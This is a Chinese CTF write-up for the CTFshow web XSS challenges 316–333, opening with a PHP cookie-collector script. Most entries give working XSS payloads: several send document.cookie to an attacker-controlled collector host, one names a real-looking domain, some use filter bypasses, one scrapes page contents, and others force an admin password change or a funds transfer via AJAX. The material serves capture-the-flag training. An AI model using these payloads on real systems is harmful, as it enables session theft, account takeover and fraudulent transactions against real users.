CTFshow--web--xss

目录

web316

web317~319

web320~326

web327

web328

web329

web330

web331

web332

web333


先在自己的服务器写上代码

php 复制代码
<?php

$content = $_GET[1];
if(isset($content)){
    file_put_contents('flag.txt','$content');
}else{
    echo 'no data input';
}

要拿到管理员的cookie , 而不是自己的

web316

<script>document.location.href="[ip]/x.php?1="+document.cookie</script>

web317~319

有了过滤

<body οnlοad="window.location.href='http://[ip]/x.php?1='+document.cookie">

web320~326

过滤了空格

<body/οnlοad="window.location.href='[ip]/x.php?1='+document.cookie">

web327

存储型xss

在信的内容那里输入

<script>document.location.href='http://pmjphw.top/x.php?1='+document.cookie\</script>

web328

注册的地方

注册一个密码为XSS Payload

<script>document.location.href='[ip]?1='+document.cookie</script>

就可以在自己的服务器上得到 管理员的cookie

在网页上将自己的cookie换掉 就可以进入到用户管理界面了 ,里面存在flag

但是一进入到里面就会跳转, 只能看到一瞬间的flag , 所以还需要进行抓包查看

多抓包了几次 , 搞了一下, 好像也进入到这个界面了, 没有跳转

web329

用上一个方法拿cookie的话没有用, 已经失效了,登录不上

直接拿内容

复制代码
<script>$('.laytable-cell-1-0-1').each(function(index,value){if(value.innerHTML.indexOf('ctf'+'show{')>-1)
{window.location.href='[ip]/x.php?1='+value.innerHTML;}});</script>

web330

有一个修改密码的模块

在修改密码的那里 写入xss payload

复制代码
<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>

然后 admin / 123 登录

然后进入到用户管理界面

速度快一点, 两秒左右就会跳转走

web331

在注册的用户名处写入 xss payload

复制代码
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'123'}});</script>

然后 admin / 123 登录

web332

先注册一个123的用户登录

然后再注册一个 xss payload 的用户

123的用户就可以收到钱了

复制代码
<script>$.ajax({url:'api/amount.php',type:'post',data:{u:'123',a:'10000'}});</script>

web333

跟上一题一样

复制代码
<script>$.ajax({url:'api/amount.php',type:'post',data:{u:'123',a:'10000'}});</script>

CTFSHOW-XSS - Boogiepop Doesn't Laugh
ctfshow-XSS篇 - 简书
https://juejin.cn/post/7083663044865163277

相关推荐
mooyuan天天14 分钟前
DVWA靶场通关笔记-存储型XSS(Stored Impossible级别)
xss·xss漏洞·存储型xss·dvwa靶场
喜葵4 小时前
前端安全防护深度实践:从XSS到供应链攻击的全面防御
前端·安全·xss
卓码软件测评16 小时前
第三方web测评机构:【WEB安全测试中HTTP方法(GET/POST/PUT)的安全风险检测】
前端·网络协议·安全·web安全·http·xss
被巨款砸中1 天前
前端视角下的 Web 安全攻防:XSS、CSRF、DDoS 一次看懂
前端·安全·xss
Bruce_Liuxiaowei2 天前
基于BeEF的XSS钓鱼攻击与浏览器劫持实验
前端·网络安全·ctf·xss
小小小CTFER2 天前
NSSCTF每日一题_Web_[SWPUCTF 2022 新生赛]奇妙的MD5
ctf
携欢2 天前
PortSwigger靶场之Stored XSS into HTML context with nothing encoded通关秘籍
前端·xss
m0_738120722 天前
CTFshow系列——命令执行web73-77(完结篇)
前端·安全·web安全·网络安全·ctfshow
喜葵3 天前
前端安全防护深度实践:从XSS到CSRF的完整安全解决方案
前端·安全·xss
mooyuan天天3 天前
DVWA靶场通关笔记-DOM型XSS(Impossible级别)
xss·dom型xss·xss漏洞·dvwa靶场